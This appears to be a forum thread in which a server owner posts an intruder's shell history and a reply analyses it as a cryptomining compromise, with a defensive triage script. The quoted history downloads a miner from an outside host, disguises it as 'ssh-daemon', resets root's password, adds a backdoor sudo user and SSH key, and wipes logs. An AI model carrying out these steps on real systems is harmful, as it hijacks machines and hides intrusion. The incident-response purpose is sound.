/>谢谢! <br /> <br />&lt;/path&gt;
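For reference, `setgid: unable to set group id to Group 4294967295` usually means the group named by the `Group` directive in httpd.conf cannot be resolved: Apache looks the name up with `getgrnam()`, the lookup fails, and the resulting gid of -1 prints as 4294967295 when read as an unsigned number. A quick sanity check is to compare the `Group` line against the system group database. In this sketch the config path and group name are made-up stand-ins, not values from the post:

```shell
# Sketch: verify that the group named by the Group directive actually exists.
# "httpd.conf.sample" and "nosuchgroup" are illustrative stand-ins.
conf=./httpd.conf.sample
printf 'User nobody\nGroup nosuchgroup\n' > "$conf"   # stand-in for your real httpd.conf

grp=$(awk '$1 == "Group" { print $2 }' "$conf")
if getent group "$grp" >/dev/null; then
    echo "group '$grp' exists"
else
    echo "group '$grp' missing - create it or fix the Group directive"
fi
```

If the group is missing, either point `Group` at an existing group (e.g. the one your `User` belongs to) or create it with `groupadd` before starting httpd as root.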
My server was compromised and someone logged in. I went through the shell history, but I can't quite tell what this person actually did or was trying to do. Can anyone analyze it?
### Here is the attacker's command history:

```bash
516  2019-04-12 15:51:16 top
517  2019-04-12 15:51:26 kill -9 2796
518  2019-04-12 15:51:27 password='QwqQw3899qQrT41qw91'
519  2019-04-12 15:51:27 pkill -9 qW*; pkill -9 ddgs*; chattr -i /tmp/*; chmod -x /tmp/*;
520  2019-04-12 15:51:27 bash /CloudrResetPwdAgent/bin/cloudResetPwdAgent.script remove
521  2019-04-12 15:51:27 bash /CloudResetPwdUpdateAgent/bin/cloudResetPwdUpdateAgent.script remove
522  2019-04-12 15:51:27 rm -rf /CloudrResetPwdAgent
523  2019-04-12 15:51:27 rm -rf /var/log/secure
524  2019-04-12 15:51:27 rm -rf /var/log/auth.log
525  2019-04-12 15:51:27 rm -rf /CloudResetPwdUpdateAgent
526  2019-04-12 15:51:27 SALT="Q9"
527  2019-04-12 15:51:27 ln /usr/sbin/pidof /bin/pidof
528  2019-04-12 15:51:27 HASH=$(perl -e "print crypt("${password}",${SALT})")
529  2019-04-12 15:51:27 usermod --password ${HASH} root
530  2019-04-12 15:51:27 useradd cronjob
531  2019-04-12 15:51:27 usermod --password ${HASH} cronjob
532  2019-04-12 15:51:27 usermod -aG wheel cronjob
533  2019-04-12 15:51:27 usermod -aG root cronjob
534  2019-04-12 15:51:27 echo '%wheel ALL=(ALL) ALL' >> '/etc/sudoers'
535  2019-04-12 15:51:27 echo 'cronjob ALL=(ALL:ALL) ALL' >> '/etc/sudoers'
536  2019-04-12 15:51:27 grep -q -F '* soft memlock 262144' /etc/security/limits.conf || echo '* soft memlock 262144' >> /etc/security/limits.conf
537  2019-04-12 15:51:27 grep -q -F '* hard memlock 262144' /etc/security/limits.conf || echo '* hard memlock 262144' >> /etc/security/limits.conf
538  2019-04-12 15:51:27 grep -q -F 'vm.nr_hugepages = 256' /etc/sysctl.conf || echo 'vm.nr_hugepages = 256' >> /etc/sysctl.conf
539  2019-04-12 15:51:27 sysctl -w vm.nr_hugepages=256
540  2019-04-12 15:51:27 killall -9 -e 'b' -v
541  2019-04-12 15:51:27 killall -9 -e 'ps' -v
542  2019-04-12 15:51:27 killall -9 -e 'bbb' -v
543  2019-04-12 15:51:27 killall -9 -e 'ifconfig' -v
544  2019-04-12 15:51:27 killall -9 -e 'zjgw' -v
545  2019-04-12 15:51:27 killall -9 -e 'tsm' -v
546  2019-04-12 15:51:27 killall -9 -e 'sys4' -v
547  2019-04-12 15:51:27 killall -9 -e 'sshd65' -v
548  2019-04-12 15:51:27 chmod -x /tmp/.mountfs/.rsync/ /tmp/.mountfs/.rsync/*
549  2019-04-12 15:51:27 chattr +i -R /tmp/.mountfs/.rsync
550  2019-04-12 15:51:27 chmod -x /root/.ttp/*
551  2019-04-12 15:51:27 chattr +i -R /root/.ttp/
552  2019-04-12 15:51:27 pkill mservice
553  2019-04-12 15:51:27 pkill xmrigMiner
554  2019-04-12 15:51:27 pkill xig
555  2019-04-12 15:51:27 pkill anacron
556  2019-04-12 15:51:27 pkill zigw
557  2019-04-12 15:51:27 pkill cd
558  2019-04-12 15:51:27 pkill systems
559  2019-04-12 15:51:27 pkill fmdkhiizka
560  2019-04-12 15:51:27 pkill bundle
561  2019-04-12 15:51:27 pkill whpclxj
562  2019-04-12 15:51:27 pkill qW3xT.4
563  2019-04-12 15:51:27 pkill ddgs.3014
564  2019-04-12 15:51:27 pkill sleep
565  2019-04-12 15:51:27 pkill -9 sleep
566  2019-04-12 15:51:27 pkill uqncnjpamg
567  2019-04-12 15:51:27 pkill rcu_sched
568  2019-04-12 15:51:27 pkill grep
569  2019-04-12 15:51:27 pkill sshd65
570  2019-04-12 15:51:27 pkill useradd
571  2019-04-12 15:51:27 pkill cnrig
572  2019-04-12 15:51:27 chmod -x /tmp/ddgs.3014
573  2019-04-12 15:51:27 chmod -x /tmp/qW3xT.4
574  2019-04-12 15:51:27 pkill rcu_bh
575  2019-04-12 15:51:27 pkill rcu_sched
576  2019-04-12 15:51:27 pkill fehulztdac
577  2019-04-12 15:51:27 pkill .xm.log
578  2019-04-12 15:51:27 pkill zjgw
579  2019-04-12 15:51:27 pkill hashfish
580  2019-04-12 15:51:27 pkill rngd
581  2019-04-12 15:51:27 pkill systemlog
582  2019-04-12 15:51:27 pkill -9 anacrontab
583  2019-04-12 15:51:27 pkill -9 hfxminer64
584  2019-04-12 15:51:27 chmod -x /tmp/systems1
585  2019-04-12 15:51:27 chmod -x /tmp/systems
586  2019-04-12 15:51:27 pkill systems1
587  2019-04-12 15:51:27 pkill systemxlv
588  2019-04-12 15:51:27 pkill systems
589  2019-04-12 15:51:27 pkill zjgw
590  2019-04-12 15:51:27 pkill .systemcero
591  2019-04-12 15:51:27 rm -rf /var/opt/.ssh/.rsync
592  2019-04-12 15:51:27 service YiluzhuanqianSer stop
593  2019-04-12 15:51:27 crontab -r
594  2019-04-12 15:51:27 chattr -iR /opt/yi*/*
595  2019-04-12 15:51:27 rm -rf /opt/yi*
596  2019-04-12 15:51:27 chmod -x /etc/btmpsys.sh /etc/wtmpsys.sh
597  2019-04-12 15:51:27 pkill wtmpsys.sh
598  2019-04-12 15:51:27 pkill etc/btmpsys.sh
599  2019-04-12 15:51:27 mkdir /opt
600  2019-04-12 15:51:27 mkdir /opt/nginx-0.12
601  2019-04-12 15:51:27 cd /opt
602  2019-04-12 15:51:27 chattr -i /usr/bin/wget
603  2019-04-12 15:51:27 chmod +x /usr/bin/wget
604  2019-04-12 15:51:27 tar xvf /opt/nginx-0.12.tar.gz -C /opt/nginx-0.12
605  2019-04-12 15:51:27 cd nginx-0.12
606  2019-04-12 15:51:27 mv xmrig-*/xmrig ssh-daemon
607  2019-04-12 15:51:27 mv xmrig-*/service service
608  2019-04-12 15:51:27 chmod +x ssh-daemon
609  2019-04-12 15:51:27 rm -rf config.json
610  2019-04-12 15:51:27 chattr +i ssh-daemon
611  2019-04-12 15:51:27 mkdir /opt/nu;
612  2019-04-12 15:51:27 cd /opt/nu;
613  2019-04-12 15:51:27 chattr +i config.json
614  2019-04-12 15:51:27 chattr +i service
615  2019-04-12 15:51:27 watch -n 5 pkill -9 qW3* &>/dev/null &
616  2019-04-12 15:51:27 watch -n 5 pkill -9 rpciod* &>/dev/null &
617  2019-04-12 15:51:27 mkdir ~/.ssh
618  2019-04-12 15:51:27 chmod -x /usr/bin/perl; chattr +i /usr/bin/perl;
619  2019-04-12 15:51:27 chmod -x /usr/cpu/-bash; chattr +i /usr/cpu/-bash
620  2019-04-12 15:51:27 rm -rf /var/log/*
621  2019-04-12 15:51:27 cd /opt/nu;
622  2019-04-12 15:51:27 echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxfc4Lg21YVxp3ajPJ6F6ZntEHOZEW0Jatz/oLvE+VXXoFJOaiqIibhWwjgJ7fro+ZKNrIUuBa3jQNuSo4E6cpR9UTQrjR+TTeJVDdTc8p0QLWo+vIkwCSyqRJmE41vIlrCTdBpPr1QlYILVKhfayYoLswPxguN+IG7Hv30p3NYfC1T8qKbi93xqrzd8JkmWDsincZ1M/0z1uz92kBZdYWKGDHtn0Rpkb0OjqcSQX6Cw4zZ3c8W+dG+UQrKP2wr/xSXVnA8fsQpJMCDT0UMFfOUal7BQF9CrwTGcuFQPetKdx5ujoBJV8MhZ7hL14eK2AnCafHzt9gOnyT7t+GttYB user@debian' > ~/.ssh/authorized_keys
623  2019-04-12 15:51:27 pkill -9 ssh-daemon;
624  2019-04-12 15:51:27 crontab -r;
625  2019-04-12 15:51:27 ln -s /bin/pidof /sbin/pidof;
626  2019-04-12 15:51:27 ln /usr/sbin/pidof /bin/pidof;
627  2019-04-12 15:51:27 apt-get install -y unzip;
628  2019-04-12 15:51:27 yum install -y unzip;
629  2019-04-12 15:51:28 wget --no-check-certificate http://8upload.ir/uploads/f8231241.zip -P /opt/nginx-0.12 -O /opt/renice-0.13.1.zip;
630  2019-04-12 15:52:16 unzip /opt/renice-0.13.1.zip -d /opt/nu/;
631  2019-04-12 15:52:16 mv /opt/nu/xmrig /opt/nu/renice;
632  2019-04-12 15:53:55 ls
633  2019-04-12 15:54:00 chattr -ia renice
634  2019-04-12 15:54:01 rm -rf renice
635  2019-04-12 15:54:04 mv xmrig ssh-daemon
636  2019-04-12 15:54:05 chmod +x ssh-daemon
637  2019-04-12 15:54:06 echo '{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": true, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 99, "pools": [ { "url": "de03.supportxmr.com:443", "user": "8AtHbYqFpSWgtcZJQcfWzQfEyyntFpc9URB26ZFUe7MzbWGqGVcXFosB1ve6Dkzb52REfzMYqTjuJbryDQSCR6sGR626EaU", "pass": "u", "rig-id": null, "nicehash": false, "keepalive": true, "variant": -1, "tls": true, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "user-agent": null, "watch": false }' > config.json;
638  2019-04-12 15:54:06 cd /opt/nu;
639  2019-04-12 15:54:06 mv renice ssh-daemon;
640  2019-04-12 15:54:06 sed -i -e 's/renice/ssh-daemon/g' /opt/nu/service;
641  2019-04-12 15:54:06 crontab /opt/nu/service;
642  2019-04-12 15:54:06 /opt/nu/ssh-daemon;
643  2019-04-12 15:54:06 echo 'alias top="top -o COMMAND"' >> ~/.bashrc;source ~/.bashrc;
644  2019-04-12 15:54:06 lscpu
645  2019-04-12 15:54:06 pidof ssh-daemon
646  2019-04-12 15:54:06 rm -rf /var/log/*;
647  2019-04-12 15:54:09 exit
```
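Reading the history, the pattern is a typical cryptomining takeover: the attacker killed competing miners (xmrigMiner, ddgs, qW3xT, cnrig), wiped `/var/log/secure`, `/var/log/auth.log` and later all of `/var/log/*`, reset root's password and added a sudo-capable `cronjob` user, planted an SSH key in `~/.ssh/authorized_keys` (`user@debian`), tuned hugepages for mining performance, and installed XMRig renamed to `ssh-daemon` under `/opt/nu` with crontab persistence, mining Monero to `de03.supportxmr.com:443`. A minimal triage sketch that checks for the persistence points named in this specific log (detection only, not cleanup; the path list is taken straight from the history above):

```shell
# Triage sketch: look for artifacts this particular history leaves behind.
# Paths come straight from the captured history; extend the list as needed.
for f in /opt/nu/ssh-daemon /opt/nu/service /opt/nginx-0.12 /tmp/.mountfs/.rsync; do
    if [ -e "$f" ]; then
        echo "FOUND: $f"          # artifact present - machine still compromised
    else
        echo "clean: $f"          # this particular artifact is absent
    fi
done

# The planted SSH key needs a content check, not just an existence check:
if grep -qs 'user@debian' ~/.ssh/authorized_keys; then
    echo "FOUND: planted SSH key in authorized_keys"
else
    echo "clean: authorized_keys"
fi
```

Even if these all come back clean, the history shows root's password being changed and the `cronjob` user added to `/etc/sudoers`, so rebuilding from a known-good image and rotating all credentials is safer than in-place cleanup.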